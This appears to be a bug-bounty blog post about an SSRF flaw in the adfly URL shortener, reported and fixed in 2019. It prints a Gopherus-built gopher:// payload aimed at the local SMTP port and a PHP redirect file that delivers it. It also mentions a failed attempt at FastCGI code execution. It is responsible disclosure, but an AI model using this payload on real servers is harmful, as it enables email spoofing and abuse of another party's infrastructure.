Gain adfly SMTP access with SSRF via Gopher Protocol

Zerb0a
Zerb0a
Jun 27 · 2 min read
Adfly Logo

Hi guys, My name is Rafli pasya. Today i want to share my story about SSRF on adfly, this bug i found 4 days ago and already Fixed.

Two month ago i found IDOR on adfly, and 4 days ago i found SSRF on adfly, using this vulnerability i able to send an email using adfly SMTP. it’s absolutely Dangerous if another hacker using this to attack Adfly Client.

Exploitation

i prepared this tool :
1. Gopherus
2. Server to upload php file

First of all i tried to short a Gopher:// url but it’s blocked by server. so i make a php file contains Gopherus Payload and it’s actually work.

i opened a CMD and type :
gopherus.py —exploit fastcgi
this is used to exploit fastcgi and gain RCE, unfortunally because i unable to see response body (only able to see <title> tag) this exploit not work.

So i tried to use SMTP exploit :
gopherus.py — exploit smtp
From Mail : adf@ly
To Mail : [myemail@.x.y]
Subject: PoCSSRF
Text: [empty]

Payload :
gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.

Now i make a php file :

<?php
header(‘location: gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.’);
?>

and i upload it to my server.

then i visit adfly site and short myserver.com/poc.php

after 1–5 minutes i check my Inbox and see an email from adf@ly.adf.ly

i quickly Report this bug to their team. it’s fixed 1 day after i reported the bug.

Thx for Reading, soory for bad English btw.

Original WriteUp :
https://raflipasya19.blogspot.com/2019/06/adfly-ssrf-to-smtp-takeover.html

Timeline :

- Sunday 23 June 2019 23:35 GMT+7 = Bug Found & Reported

- Monday 24 June 2019 17:16 GMT+7 = Triaged

- Monday 24 June 2019 22:34 GMT+7 = Bug Fixed

Zerb0a

Written by

Zerb0a

Blogg : https://raflipasya19.blogspot.com